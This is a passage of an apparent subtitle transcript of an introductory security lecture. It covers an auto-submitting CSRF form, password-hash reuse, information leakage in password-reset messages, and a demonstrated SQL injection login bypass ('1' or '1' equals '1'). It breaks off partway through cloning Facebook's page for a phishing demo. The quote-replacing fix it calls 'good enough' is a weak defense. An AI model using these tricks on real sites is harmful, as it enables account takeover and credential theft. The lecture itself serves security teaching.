logged in, or your cookie was valid for Hack Bank, 1210 01:04:31,340 --> 01:04:33,800 then this would initiate a transfer of $500. 1211 01:04:33,800 --> 01:04:37,850 And I can play another similar trick to what I did a moment ago with the image 1212 01:04:37,850 --> 01:04:43,070 by doing something like this where, when the page is loaded, 1213 01:04:43,070 --> 01:04:44,435 instantly submit this form. 1214 01:04:44,435 --> 01:04:46,310 So you don't even have to click here anymore. 1215 01:04:46,310 --> 01:04:47,630 It's just going to go through the document, 1216 01:04:47,630 --> 01:04:50,780 document being JavaScript's way of referring to the entire web page, 1217 01:04:50,780 --> 01:04:53,600 find the first form, form zeros, assuming 1218 01:04:53,600 --> 01:04:57,380 this is the first form on the page, and just submit it. 1219 01:04:57,380 --> 01:04:59,840 Doesn't matter what else is going on. 1220 01:04:59,840 --> 01:05:00,860 Just submit this form. 1221 01:05:00,860 --> 01:05:06,110 That would also initiate transfer if you clicked on that link from my email. 1222 01:05:06,110 --> 01:05:10,010 So a quick summary of these two different types of attacks. 1223 01:05:10,010 --> 01:05:12,740 Cross-site scripting attacks, the adversary 1224 01:05:12,740 --> 01:05:16,940 tricks you into executing code on your browser to do something locally 1225 01:05:16,940 --> 01:05:19,070 that you probably did not intend. 1226 01:05:19,070 --> 01:05:22,280 And a cross-site request forgery, something 1227 01:05:22,280 --> 01:05:27,320 that appears to be a legitimate request from your browser 1228 01:05:27,320 --> 01:05:31,220 because it's relying on cookies, your ostensibly logged in in that way, 1229 01:05:31,220 --> 01:05:35,670 but you don't actually mean to make that request. 1230 01:05:35,670 --> 01:05:37,670 Now let's talk about a couple of vulnerabilities 1231 01:05:37,670 --> 01:05:40,340 that exist in the context of a database, which I 1232 01:05:40,340 --> 01:05:42,600 know you've discussed recently as well. 1233 01:05:42,600 --> 01:05:46,170 So imagine that I have a table of users on my database 1234 01:05:46,170 --> 01:05:49,580 that looks like this, that each of them has an ID number, they have a username, 1235 01:05:49,580 --> 01:05:51,170 and they have a password. 1236 01:05:51,170 --> 01:05:53,630 Now, the obvious vulnerability here is I really 1237 01:05:53,630 --> 01:05:57,800 shouldn't be storing my users' passwords like this in the clear. 1238 01:05:57,800 --> 01:06:01,370 If somebody were to ever hack and get a hold of this database file, 1239 01:06:01,370 --> 01:06:03,020 that's really, really bad. 1240 01:06:03,020 --> 01:06:08,740 I am not taking best practices to protect my customers' information. 1241 01:06:08,740 --> 01:06:09,990 So I want to avoid doing that. 1242 01:06:09,990 --> 01:06:14,060 So instead what I might do, as we've discussed, is hash their passwords, 1243 01:06:14,060 --> 01:06:17,540 run them through some hash function so that when they're actually stored, 1244 01:06:17,540 --> 01:06:19,880 they get stored looking something like this. 1245 01:06:19,880 --> 01:06:23,120 You have no idea what the original password was. 1246 01:06:23,120 --> 01:06:25,050 And because it's a hash, it's irreversible. 1247 01:06:25,050 --> 01:06:28,280 You should not be able to undo what I did 1248 01:06:28,280 --> 01:06:30,390 when I ran through the hash function. 1249 01:06:30,390 --> 01:06:33,560 But there's actually still a vulnerability here. 1250 01:06:33,560 --> 01:06:35,840 And the vulnerability here is not technical. 1251 01:06:35,840 --> 01:06:38,570 It's human again. 1252 01:06:38,570 --> 01:06:41,785 And the vulnerability that exists here is that we see-- 1253 01:06:41,785 --> 01:06:43,910 we're using a hash function, so it's deterministic. 1254 01:06:43,910 --> 01:06:47,300 When we pass some data through it, we're going to get the same output every time 1255 01:06:47,300 --> 01:06:48,810 we pass data through it. 1256 01:06:48,810 --> 01:06:53,900 And two of our users, Charlie and Eric, have the same hash. 1257 01:06:53,900 --> 01:06:56,390 We saw this makes sense, because if we go back a moment, 1258 01:06:56,390 --> 01:06:59,840 they also had the same actual password when it was stored in plain text. 1259 01:06:59,840 --> 01:07:03,530 We've gone out of our way to try and defend against that by hashing it. 1260 01:07:03,530 --> 01:07:06,860 But somebody who gets a hold of this database file, for example, 1261 01:07:06,860 --> 01:07:11,750 they hack into it, they get it, they'll see two people have the same password. 1262 01:07:11,750 --> 01:07:14,540 And maybe this is a very small subset of my user base. 1263 01:07:14,540 --> 01:07:17,150 And maybe there's hundreds of thousands of people. 1264 01:07:17,150 --> 01:07:20,720 And maybe 10% of them all have the same hash. 1265 01:07:20,720 --> 01:07:26,670 Well, again, human beings, we are not the best at defending our own stuff. 1266 01:07:26,670 --> 01:07:29,090 It's a sad truth that the most common password 1267 01:07:29,090 --> 01:07:32,997 is password followed by some of these other examples we had a second ago. 1268 01:07:32,997 --> 01:07:34,580 All of these are pretty bad passwords. 1269 01:07:34,580 --> 01:07:38,990 They're all on the list of some of the most commonly used passwords 1270 01:07:38,990 --> 01:07:42,920 for all services, which means that if you see a hash like this, 1271 01:07:42,920 --> 01:07:45,620 it doesn't matter that we have taken steps 1272 01:07:45,620 --> 01:07:49,130 to protect our users against this. 1273 01:07:49,130 --> 01:07:55,700 If we see a hash like this many, many times in our database, a clever hacker, 1274 01:07:55,700 --> 01:07:58,732 a clever adversary might think, oh, well, 1275 01:07:58,732 --> 01:08:00,440 I'm seeing this password 10% of the time, 1276 01:08:00,440 --> 01:08:04,400 so I'm going to guess that Charlie's password for the service is 12345 1277 01:08:04,400 --> 01:08:05,330 and they're wrong. 1278 01:08:05,330 --> 01:08:08,480 And then they'll maybe try abcdef and they're wrong, and then maybe try 1279 01:08:08,480 --> 01:08:10,520 password and they're right. 1280 01:08:10,520 --> 01:08:13,910 And then all of a sudden every time they see that hash, they 1281 01:08:13,910 --> 01:08:18,090 can assume that the password is password for every single one of those users. 1282 01:08:18,090 --> 01:08:24,960 So again, nothing we can do as technologists to solve this problem. 1283 01:08:24,960 --> 01:08:29,510 This is really just getting folks to understand 1284 01:08:29,510 --> 01:08:33,276 that using different passwords, using non-standard passwords, 1285 01:08:33,276 --> 01:08:34,109 is really important. 1286 01:08:34,109 --> 01:08:37,067 That's why we talked about password managers and maybe not even knowing 1287 01:08:37,067 --> 01:08:41,160 your own passwords in a prior lecture. 1288 01:08:41,160 --> 01:08:45,140 There's another problem that can exist, though, with databases, in particular, 1289 01:08:45,140 --> 01:08:47,120 when we see screens like this. 1290 01:08:47,120 --> 01:08:51,560 So this is a contrived login screen that has a username and password 1291 01:08:51,560 --> 01:08:55,220 field And a Forgot Password button whose purpose in life 1292 01:08:55,220 --> 01:08:59,149 is, if you type in your email address and you-- 1293 01:08:59,149 --> 01:09:01,189 which is the username in this case, and you 1294 01:09:01,189 --> 01:09:05,510 have the Forgot Password box checked, and you try and click login, 1295 01:09:05,510 --> 01:09:09,418 instead of actually logging you in, it's going to email you, hopefully, 1296 01:09:09,418 --> 01:09:11,960 a link to your password, not your actual password for reasons 1297 01:09:11,960 --> 01:09:14,970 we previously discussed as well. 1298 01:09:14,970 --> 01:09:20,640 But what if when we click on this button we see this? 1299 01:09:20,640 --> 01:09:22,310 OK. 1300 01:09:22,310 --> 01:09:25,520 We've emailed you a link to change your password. 1301 01:09:25,520 --> 01:09:29,660 Does that seem inherently problematic? 1302 01:09:29,660 --> 01:09:30,479 Perhaps not. 1303 01:09:30,479 --> 01:09:34,600 But what about if you see this as well? 1304 01:09:34,600 --> 01:09:37,100 Somebody might see this if they're logged in as well. 1305 01:09:37,100 --> 01:09:40,490 Sorry, no user with that email address. 1306 01:09:40,490 --> 01:09:44,870 Does that perhaps seem problematic when you compare it against this? 1307 01:09:44,870 --> 01:09:48,350 This is an example of something called information leakage. 1308 01:09:48,350 --> 01:09:51,710 Perhaps an adversary has hacked some other database 1309 01:09:51,710 --> 01:09:55,040 where folks were not being as secure with credentials. 1310 01:09:55,040 --> 01:09:58,970 And so they have a whole set of email addresses mapped to credentials. 1311 01:09:58,970 --> 01:10:02,570 And because human beings tend to reuse the same credentials 1312 01:10:02,570 --> 01:10:06,650 on multiple different services, they are trying different services 1313 01:10:06,650 --> 01:10:09,170 that they believe that these users might also 1314 01:10:09,170 --> 01:10:13,550 use using those same username and password combinations. 1315 01:10:13,550 --> 01:10:18,860 If this is the way that we field these types of forgot password inquiries, 1316 01:10:18,860 --> 01:10:22,130 we're revealing some information potentially. 1317 01:10:22,130 --> 01:10:27,650 If Alice is a user, we're now saying, yes, Alice is a user of this. 1318 01:10:27,650 --> 01:10:29,300 Try this password. 1319 01:10:29,300 --> 01:10:34,490 If we get something like this, then the adversary might not bother trying. 1320 01:10:34,490 --> 01:10:37,820 They've realized, oh, Alice is not a user of this service. 1321 01:10:37,820 --> 01:10:41,720 And even if they're not trying to hack into it, if we do something like this, 1322 01:10:41,720 --> 01:10:45,230 we're also telling that adversary quite a bit about Alice. 1323 01:10:45,230 --> 01:10:49,340 Now we know Alice uses this service, and this service, and this service, 1324 01:10:49,340 --> 01:10:50,600 and not this service. 1325 01:10:50,600 --> 01:10:54,050 And they can sort of create a picture of who Alice might be. 1326 01:10:54,050 --> 01:11:00,398 They're sort of using her digital footprint to understand more about her. 1327 01:11:00,398 --> 01:11:03,190 A better response in this case might be to say something like this, 1328 01:11:03,190 --> 01:11:04,550 request received. 1329 01:11:04,550 --> 01:11:07,702 If you're in our system, you'll receive an email with instructions shortly. 1330 01:11:07,702 --> 01:11:09,410 That's not tipping our hand either way as 1331 01:11:09,410 --> 01:11:12,890 to whether the user is in the database or not in the database. 1332 01:11:12,890 --> 01:11:15,860 No information leakage here, and generally a better way 1333 01:11:15,860 --> 01:11:19,610 to protect our customer's privacy. 1334 01:11:19,610 --> 01:11:22,850 Now, that's not the only problem that we can have with databases. 1335 01:11:22,850 --> 01:11:25,610 We've alluded to this idea of SQL injection. 1336 01:11:25,610 --> 01:11:28,100 And there's this comment that gets the rounds quite a bit 1337 01:11:28,100 --> 01:11:30,620 when we talk about SQL injection from a web comic called 1338 01:11:30,620 --> 01:11:35,240 XKCD that involves a SQL injection attack, which is basically 1339 01:11:35,240 --> 01:11:39,080 providing some information that-- 1340 01:11:39,080 --> 01:11:42,670 or providing some text or some query that we want to make to a database 1341 01:11:42,670 --> 01:11:46,690 where that query actually does something unintended. 1342 01:11:46,690 --> 01:11:50,700 It actually itself is SQL as opposed to just plugging in some parameter, 1343 01:11:50,700 --> 01:11:53,750 like what is your name, and then searching the database for that name. 1344 01:11:53,750 --> 01:11:55,708 Instead of giving you my name, I might give you 1345 01:11:55,708 --> 01:11:58,040 something that is actually a SQL query that's 1346 01:11:58,040 --> 01:12:01,050 going to be executed that you don't want me to execute. 1347 01:12:01,050 --> 01:12:03,750 So let's see an example of how this might work. 1348 01:12:03,750 --> 01:12:07,800 So here's another simple username and password field. 1349 01:12:07,800 --> 01:12:11,580 And in this example, I've written my password field poorly intentionally 1350 01:12:11,580 --> 01:12:14,000 for purposes of the example so that it will actually 1351 01:12:14,000 --> 01:12:16,970 show you the text that is typed as opposed to showing 1352 01:12:16,970 --> 01:12:19,640 you stars like a password field should. 1353 01:12:19,640 --> 01:12:23,300 So this is something that the user sees when they access my site. 1354 01:12:23,300 --> 01:12:26,718 And perhaps on the back end in the server-side code, inside of Python 1355 01:12:26,718 --> 01:12:29,510 somewhere I have written a SQL query that looks like the following. 1356 01:12:29,510 --> 01:12:35,540 When the login button is clicked, execute the following SQL query. 1357 01:12:35,540 --> 01:12:40,040 SELECT star from users where username equals uname-- 1358 01:12:40,040 --> 01:12:45,230 and uname here in yellow referring to whatever was typed in this box-- 1359 01:12:45,230 --> 01:12:48,050 and password equals pword, where, again, pword 1360 01:12:48,050 --> 01:12:51,140 is referring to whatever was typed in this box. 1361 01:12:51,140 --> 01:12:54,120 So we're doing a SQL query to select star from users, 1362 01:12:54,120 --> 01:12:57,360 get all of the information from the users table 1363 01:12:57,360 --> 01:13:01,170 where the username equals whatever they typed in that box 1364 01:13:01,170 --> 01:13:05,560 and the password equals whatever they typed in that box. 1365 01:13:05,560 --> 01:13:07,410 And so, for example, if I have somebody who 1366 01:13:07,410 --> 01:13:09,810 logs in with the username Alice and the password 1367 01:13:09,810 --> 01:13:14,580 12345, what the query would actually look like with these values plugged 1368 01:13:14,580 --> 01:13:19,920 into it might look something like this; SELECT star from users where username 1369 01:13:19,920 --> 01:13:25,200 equals Alice and password equals 12345. 1370 01:13:25,200 --> 01:13:30,420 If there is nobody with username Alice or Alice's password is not 12345, 1371 01:13:30,420 --> 01:13:31,770 then this will fail. 1372 01:13:31,770 --> 01:13:34,890 Both of those conditions need to be true. 1373 01:13:34,890 --> 01:13:37,890 But what about this? 1374 01:13:37,890 --> 01:13:46,800 Someone whose username is hacker and their password is 1' or '1' equals '1. 1375 01:13:46,800 --> 01:13:49,800 1376 01:13:49,800 --> 01:13:51,848 That looks pretty weird. 1377 01:13:51,848 --> 01:13:53,640 And the reason that that looks pretty weird 1378 01:13:53,640 --> 01:13:57,390 is because this is an attempt to inject SQL, 1379 01:13:57,390 --> 01:14:02,820 to trick SQL into doing something that is presumably not intended by the code 1380 01:14:02,820 --> 01:14:04,050 that we wrote. 1381 01:14:04,050 --> 01:14:07,980 Now, it probably helps to take a look at it plugging the data in 1382 01:14:07,980 --> 01:14:11,580 to see what exactly this is going to do. 1383 01:14:11,580 --> 01:14:16,270 SELECT star from users where username equals hacker or-- 1384 01:14:16,270 --> 01:14:23,190 excuse me, and password equals '1' or and so on and so on. 1385 01:14:23,190 --> 01:14:26,880 1386 01:14:26,880 --> 01:14:30,180 Maybe I do have a person whose username actually is hacker, 1387 01:14:30,180 --> 01:14:33,000 but that's probably not their password. 1388 01:14:33,000 --> 01:14:34,050 That doesn't matter. 1389 01:14:34,050 --> 01:14:37,350 I'm still going to be able to log in if I 1390 01:14:37,350 --> 01:14:39,140 have somebody whose username is hacker. 1391 01:14:39,140 --> 01:14:41,850 And the reason for that is because of this or. 1392 01:14:41,850 --> 01:14:45,780 I have sort of short circuited the end of the SQL query. 1393 01:14:45,780 --> 01:14:50,370 I have this quote mark that demarcates the end of what the user presumably 1394 01:14:50,370 --> 01:14:51,780 typed in. 1395 01:14:51,780 --> 01:14:54,660 But I've actually literally typed those into my password 1396 01:14:54,660 --> 01:14:59,060 to trick SQL such that if hacker's password equals 1, 1397 01:14:59,060 --> 01:15:03,420 it just happens to literally be the character 1, OK, I have succeeded. 1398 01:15:03,420 --> 01:15:05,250 I guess that's a really bad password, and I 1399 01:15:05,250 --> 01:15:08,100 shouldn't be able to log it in that way, but maybe that is the case 1400 01:15:08,100 --> 01:15:09,060 and I'm able to log in. 1401 01:15:09,060 --> 01:15:13,560 But even if not, this other thing is true. 1402 01:15:13,560 --> 01:15:18,660 '1' does equal '1'. 1403 01:15:18,660 --> 01:15:23,030 So as long as somebody whose username is hacker exists in the database, 1404 01:15:23,030 --> 01:15:27,330 I am now able to log in as hacker because this is true. 1405 01:15:27,330 --> 01:15:29,230 This part's probably not true, right? 1406 01:15:29,230 --> 01:15:31,860 It's unlikely that their password is 1. 1407 01:15:31,860 --> 01:15:36,960 Regardless of what their password is, this part actually is true. 1408 01:15:36,960 --> 01:15:40,200 It's a very simple SQL injection attack. 1409 01:15:40,200 --> 01:15:44,490 I'm basically logging in as someone who I'm presumably not supposed 1410 01:15:44,490 --> 01:15:48,780 to be able to log in as, but it illustrates the kind of thing 1411 01:15:48,780 --> 01:15:50,550 that could happen. 1412 01:15:50,550 --> 01:15:54,450 You are allowing people to bypass logins. 1413 01:15:54,450 --> 01:15:59,100 Now, it could get worse if your database administrator username 1414 01:15:59,100 --> 01:16:01,710 is admin or something very common. 1415 01:16:01,710 --> 01:16:04,683 The default for this is typically admin. 1416 01:16:04,683 --> 01:16:06,600 This would potentially give people the ability 1417 01:16:06,600 --> 01:16:08,760 to be database administrators, that they're 1418 01:16:08,760 --> 01:16:14,370 able to execute exactly this kind of trick on the admin user. 1419 01:16:14,370 --> 01:16:16,830 Now they have administrative access to your database, which 1420 01:16:16,830 --> 01:16:19,580 means they can do things like manipulate the data in the database, 1421 01:16:19,580 --> 01:16:23,350 change things, add things, delete things that you don't want to have deleted. 1422 01:16:23,350 --> 01:16:28,170 And in the case of a database, deletion is pretty permanent. 1423 01:16:28,170 --> 01:16:32,580 You can't undo a delete most of the time in a database 1424 01:16:32,580 --> 01:16:35,890 as the way you might be able to do with other files. 1425 01:16:35,890 --> 01:16:38,430 Now, are there techniques to avoid this kind of attack? 1426 01:16:38,430 --> 01:16:40,108 Fortunately, there are. 1427 01:16:40,108 --> 01:16:42,900 Right now I'd like just to just take a look at a very simple Python 1428 01:16:42,900 --> 01:16:45,720 program that replicates the kind of thing 1429 01:16:45,720 --> 01:16:50,080 that one could do in a more robust, more complex SQL situation. 1430 01:16:50,080 --> 01:16:52,080 So let's pull up a program here where we're just 1431 01:16:52,080 --> 01:16:54,870 simulating this idea of a SQL injection just 1432 01:16:54,870 --> 01:17:00,230 to show you how it's not that difficult to defend against it. 1433 01:17:00,230 --> 01:17:03,840 So let's pull up the code here in this file login.py. 1434 01:17:03,840 --> 01:17:06,060 So there's not that much going on here. 1435 01:17:06,060 --> 01:17:07,950 I have x equals input username. 1436 01:17:07,950 --> 01:17:10,920 So x, recall, is a Python variable. 1437 01:17:10,920 --> 01:17:14,460 And input username is basically going to prompt the user with the string 1438 01:17:14,460 --> 01:17:17,405 username and then expect them to type something after that. 1439 01:17:17,405 --> 01:17:19,530 And then we do exactly the same thing with password 1440 01:17:19,530 --> 01:17:21,270 except storing the result there in y. 1441 01:17:21,270 --> 01:17:24,000 So whatever the user types after username will get stored in x. 1442 01:17:24,000 --> 01:17:27,270 Whatever they type after password will get stored in y. 1443 01:17:27,270 --> 01:17:29,030 And then here I'm just going to print. 1444 01:17:29,030 --> 01:17:33,310 And in the SQL context, this would be the query that actually gets executed. 1445 01:17:33,310 --> 01:17:35,610 So imagine that that's what's happening instead. 1446 01:17:35,610 --> 01:17:39,850 SELECT star from users where username equals and then this symbol here, 1447 01:17:39,850 --> 01:17:40,350 '[? x ?]'. 1448 01:17:40,350 --> 01:17:44,180 1449 01:17:44,180 --> 01:17:46,680 What I'm doing here is just using a Python-formatted string. 1450 01:17:46,680 --> 01:17:48,560 That's what this f here-- it's not a typo-- 1451 01:17:48,560 --> 01:17:51,810 at the beginning means, is I'm going to plug in whatever the person, the user, 1452 01:17:51,810 --> 01:17:55,640 typed at the first prompt, which I stored in x here, 1453 01:17:55,640 --> 01:17:59,933 and whatever the user typed the second prompt that's store in y there. 1454 01:17:59,933 --> 01:18:01,600 So let's actually just run this program. 1455 01:18:01,600 --> 01:18:03,980 So let's pop open here for a second. 1456 01:18:03,980 --> 01:18:07,780 The name of this program is login.py, so I'm going to type python 1457 01:18:07,780 --> 01:18:10,880 login.py, Enter. 1458 01:18:10,880 --> 01:18:13,290 Username, Doug. 1459 01:18:13,290 --> 01:18:16,308 Password, 12345. 1460 01:18:16,308 --> 01:18:19,600 And then the query, hypothetically, that would get executed if I constructed it 1461 01:18:19,600 --> 01:18:22,480 in this way is SELECT star from users where username 1462 01:18:22,480 --> 01:18:25,210 equals Doug and password equals 12345. 1463 01:18:25,210 --> 01:18:26,320 Seems reasonable. 1464 01:18:26,320 --> 01:18:30,130 But if I try and do the adversary thing that I did a moment ago, 1465 01:18:30,130 --> 01:18:38,380 username equals Doug, password equals 1' or '1' equals '1, not 1466 01:18:38,380 --> 01:18:42,850 a final single quote, and I hit Enter, then I end up with SELECT star 1467 01:18:42,850 --> 01:18:49,865 from users where username equals Doug and password equals 1 or 1 equals 1. 1468 01:18:49,865 --> 01:18:52,000 And the latter part of that is true. 1469 01:18:52,000 --> 01:18:53,890 The former part is false. 1470 01:18:53,890 --> 01:18:56,860 But it's good enough that I would be able to log in 1471 01:18:56,860 --> 01:18:59,650 if I did something like that. 1472 01:18:59,650 --> 01:19:02,200 But we want to try and get around that. 1473 01:19:02,200 --> 01:19:05,200 So now let's take a look at a second file that might solve this problem. 1474 01:19:05,200 --> 01:19:11,380 So I'm going to open up login2.py in my editor here. 1475 01:19:11,380 --> 01:19:15,610 So now it starts out exactly the same, x equals something, y equals something. 1476 01:19:15,610 --> 01:19:18,640 But I'm making a pretty basic substitution. 1477 01:19:18,640 --> 01:19:23,020 I'm replacing every time that I see single quotes with double quotes. 1478 01:19:23,020 --> 01:19:25,050 So I'm replacing every instance of single quote, 1479 01:19:25,050 --> 01:19:26,800 and I have to preface it with a backslash. 1480 01:19:26,800 --> 01:19:30,160 Because notice I'm actually using single quotes to identify the character. 1481 01:19:30,160 --> 01:19:33,880 It just so happens that it's to indicate that I'm trying to substitute something 1482 01:19:33,880 --> 01:19:35,350 which I'm putting in single quotes. 1483 01:19:35,350 --> 01:19:38,440 The thing I'm trying to substitute actually is a single quote, 1484 01:19:38,440 --> 01:19:42,130 and so I need to put a backslash in front of it 1485 01:19:42,130 --> 01:19:44,440 to escape that character such that it actually 1486 01:19:44,440 --> 01:19:48,310 gets treated as a single quotation mark character as opposed 1487 01:19:48,310 --> 01:19:50,308 to some special Python-- 1488 01:19:50,308 --> 01:19:52,850 Python's not going to try and interpret it in some other way. 1489 01:19:52,850 --> 01:19:56,890 So I want to replace every instance of a single quote in x with a double quote, 1490 01:19:56,890 --> 01:20:00,010 and I want to replace every instance of a single quote in y 1491 01:20:00,010 --> 01:20:01,030 with a double quote. 1492 01:20:01,030 --> 01:20:02,650 Now, why do I want to do that? 1493 01:20:02,650 --> 01:20:07,240 Because notice in my actual Python string here 1494 01:20:07,240 --> 01:20:12,670 I'm using single quotes to set off the variables for purposes 1495 01:20:12,670 --> 01:20:14,290 of SQL's interpretation of them. 1496 01:20:14,290 --> 01:20:16,520 So where the user name equals this string, 1497 01:20:16,520 --> 01:20:18,830 I'm using single quotes to do that. 1498 01:20:18,830 --> 01:20:23,920 So if my username or my password also contained single quotation mark 1499 01:20:23,920 --> 01:20:27,430 characters, when SQL was interpreting it, 1500 01:20:27,430 --> 01:20:32,080 it might think that the next single quote character it sees is the end. 1501 01:20:32,080 --> 01:20:34,300 I'm done with what I've prompted. 1502 01:20:34,300 --> 01:20:37,420 And that's exactly how I tricked it in the previous example. 1503 01:20:37,420 --> 01:20:40,930 I used that first single quote, which seemed kind of random and out 1504 01:20:40,930 --> 01:20:44,380 of nowhere, to trick SQL into thinking I'm done with this. 1505 01:20:44,380 --> 01:20:48,850 Then I used the keyword or back now into a SQL and not some string 1506 01:20:48,850 --> 01:20:52,570 that I'm searching for, and then I would continue this trick going forward. 1507 01:20:52,570 --> 01:20:55,732 So this is designed to eliminate all the single quotes, 1508 01:20:55,732 --> 01:20:57,940 because the single quotes mean something very special 1509 01:20:57,940 --> 01:21:01,510 in the context of my SQL query itself. 1510 01:21:01,510 --> 01:21:06,610 If you're actually using SQL libraries that are tied into Python, 1511 01:21:06,610 --> 01:21:11,108 the ability to replace things is much more robust than this example. 1512 01:21:11,108 --> 01:21:12,900 But even this very simple example where I'm 1513 01:21:12,900 --> 01:21:16,480 doing just this very basic substitution is good enough 1514 01:21:16,480 --> 01:21:20,390 to get around the injection attack that we just looked at. 1515 01:21:20,390 --> 01:21:23,350 So this is now in login2.py. 1516 01:21:23,350 --> 01:21:24,520 Let's do this. 1517 01:21:24,520 --> 01:21:26,895 Let's Python login2.py. 1518 01:21:26,895 --> 01:21:28,270 And we'll start out the same way. 1519 01:21:28,270 --> 01:21:30,890 We'll do Doug and 12345. 1520 01:21:30,890 --> 01:21:32,895 And it appears that nothing has changed. 1521 01:21:32,895 --> 01:21:35,020 The behavior is otherwise identical because I'm not 1522 01:21:35,020 --> 01:21:36,730 trying to do any tricks like that. 1523 01:21:36,730 --> 01:21:41,440 SELECT star from users where username equals Doug and password equals 12345. 1524 01:21:41,440 --> 01:21:45,250 But if I now try that same trick that I did a moment ago, 1525 01:21:45,250 --> 01:21:55,090 so password is 1' or '1' equals '1 and I hit Enter, 1526 01:21:55,090 --> 01:21:59,020 now I'm not subject to that same SQL injection anymore because I'm trying 1527 01:21:59,020 --> 01:22:02,800 to select all the information from the users table where the username is Doug 1528 01:22:02,800 --> 01:22:03,970 and the password equals-- 1529 01:22:03,970 --> 01:22:06,950 And notice that here is the first single quote. 1530 01:22:06,950 --> 01:22:08,440 Here is the second one. 1531 01:22:08,440 --> 01:22:11,770 So it's thinking that entire thing now is the password. 1532 01:22:11,770 --> 01:22:20,468 Only if my password is literally 1" or "1" equals "1, 1533 01:22:20,468 --> 01:22:22,010 then I would be literally logging in. 1534 01:22:22,010 --> 01:22:23,980 If that happened to be my password, this would work. 1535 01:22:23,980 --> 01:22:25,150 But otherwise I've escaped. 1536 01:22:25,150 --> 01:22:28,630 I've stopped the adversary from being able to leverage 1537 01:22:28,630 --> 01:22:33,080 a simple trick like this to break in to my database 1538 01:22:33,080 --> 01:22:34,930 when perhaps they're not intended to do so. 1539 01:22:34,930 --> 01:22:41,140 And again, in actual SQL injection defense, the substitutions that we make 1540 01:22:41,140 --> 01:22:42,640 are much more complicated than this. 1541 01:22:42,640 --> 01:22:45,932 We're not just looking for single quote characters and double quote characters, 1542 01:22:45,932 --> 01:22:48,610 but we're considering semicolons or any other special characters 1543 01:22:48,610 --> 01:22:51,460 that SQL would interpret as part of a statement. 1544 01:22:51,460 --> 01:22:53,900 We can escape those out so that users could literally 1545 01:22:53,900 --> 01:22:59,720 use single quotes or semicolons or the like in their passwords 1546 01:22:59,720 --> 01:23:03,160 without necessarily compromising the integrity of the entire database 1547 01:23:03,160 --> 01:23:04,510 overall. 1548 01:23:04,510 --> 01:23:08,480 So we've taken a look at several of the most common, most obvious ways 1549 01:23:08,480 --> 01:23:11,180 that an adversary might be able to extract information 1550 01:23:11,180 --> 01:23:13,910 either from a business or an individual. 1551 01:23:13,910 --> 01:23:17,660 And these ways are kind of attention-getting in some context. 1552 01:23:17,660 --> 01:23:19,880 But let's focus now-- let's go back and bring things 1553 01:23:19,880 --> 01:23:22,280 full circle to something I've mentioned many times, 1554 01:23:22,280 --> 01:23:28,400 which is humans are the core fatal flaw in all of these security things 1555 01:23:28,400 --> 01:23:29,800 that we're dealing with here. 1556 01:23:29,800 --> 01:23:31,800 And so let's bring things full circle by talking 1557 01:23:31,800 --> 01:23:34,220 about phishing, what phishing is. 1558 01:23:34,220 --> 01:23:39,140 So phishing is just an attempt by an adversary to prey upon us 1559 01:23:39,140 --> 01:23:45,440 and our unfortunate general ignorance of basic security protocols. 1560 01:23:45,440 --> 01:23:47,900 So it's just an attempt to socially engineer, 1561 01:23:47,900 --> 01:23:49,730 basically, information out of someone. 1562 01:23:49,730 --> 01:23:52,460 You pretend to be someone that you are not. 1563 01:23:52,460 --> 01:23:54,710 And if you do so convincingly enough, you 1564 01:23:54,710 --> 01:23:58,190 might be able to extract information about that person. 1565 01:23:58,190 --> 01:24:01,053 Now, phishing you'll also see in other contexts that are-- 1566 01:24:01,053 --> 01:24:03,470 computer scientists like to be clever with their wordplay. 1567 01:24:03,470 --> 01:24:06,800 You'll see things like netting, which is basically a phishing attack that 1568 01:24:06,800 --> 01:24:08,780 launches against many people at once, hoping 1569 01:24:08,780 --> 01:24:11,060 they'll be able to get one or two. 1570 01:24:11,060 --> 01:24:13,400 There's spear phishing, which is a phishing 1571 01:24:13,400 --> 01:24:17,240 attack that targets one specific person trying to get information from them. 1572 01:24:17,240 --> 01:24:20,090 And then there's whaling, which is a phishing attack that 1573 01:24:20,090 --> 01:24:23,330 is targeted against somebody who is perceived to have a lot of information 1574 01:24:23,330 --> 01:24:25,413 or whose information is particularly valuable such 1575 01:24:25,413 --> 01:24:28,820 that you'd be phishing for some big whale. 1576 01:24:28,820 --> 01:24:31,730 Now, one of the most obvious and easy types of phishing attack 1577 01:24:31,730 --> 01:24:32,900 looks like this. 1578 01:24:32,900 --> 01:24:35,450 It's a simple URL substitution. 1579 01:24:35,450 --> 01:24:39,590 This is how we can write a link in HTML. 1580 01:24:39,590 --> 01:24:43,480 A is the HTML tag for anchor, which we use for hyperlinks. 1581 01:24:43,480 --> 01:24:46,460 Href is where we are going to. 1582 01:24:46,460 --> 01:24:50,660 And then we also have the ability to specify some text at the end of that. 1583 01:24:50,660 --> 01:24:54,830 These two items do not have to match, as you can see here. 1584 01:24:54,830 --> 01:25:02,750 I can say we're going to URL2 but actually send you to URL1. 1585 01:25:02,750 --> 01:25:08,420 This is an incredibly common way to get information from somebody. 1586 01:25:08,420 --> 01:25:12,830 They think they're going one place but they're actually going someplace else. 1587 01:25:12,830 --> 01:25:16,430 And to show you, as a very basic example, just how easy it 1588 01:25:16,430 --> 01:25:21,560 is to potentially trick somebody into going somewhere they're not supposed to 1589 01:25:21,560 --> 01:25:25,220 and potentially then revealing credentials as well, 1590 01:25:25,220 --> 01:25:28,580 let's just take a simple example here with Facebook. 1591 01:25:28,580 --> 01:25:31,970 And why don't we just take a moment to build our own version of Facebook 1592 01:25:31,970 --> 01:25:36,410 and see if we can't get somebody to potentially reveal information to us? 1593 01:25:36,410 --> 01:25:38,750 So let's imagine that I have acquired some domain 1594 01:25:38,750 --> 01:25:41,390 name that's really similar to Facebook.com, 1595 01:25:41,390 --> 01:25:44,150 like it's off by one character. 1596 01:25:44,150 --> 01:25:45,350 It's a common typo. 1597 01:25:45,350 --> 01:25:48,198 For example fs maybe is a common thing. 1598 01:25:48,198 --> 01:25:49,990 People mistype the A or something like that 1599 01:25:49,990 --> 01:25:54,800 that would be really not necessarily obvious to somebody at the outset. 1600 01:25:54,800 --> 01:25:59,240 One way that I might be able to just take advantage of somebody's thinking 1601 01:25:59,240 --> 01:26:01,670 that they're logging into Facebook is to make a page that 1602 01:26:01,670 --> 01:26:05,150 looks exactly the same as Facebook. 1603 01:26:05,150 --> 01:26:07,640 That's actually not very difficult to do. 1604 01:26:07,640 --> 01:26:09,680 All you have to do is open up Facebook here. 1605 01:26:09,680 --> 01:26:14,720 And because its HTML is available to me, I can right click on it, 1606 01:26:14,720 --> 01:26:18,530 view page source, take a second to load here-- 1607 01:26:18,530 --> 01:26:20,480 Facebook is a pretty 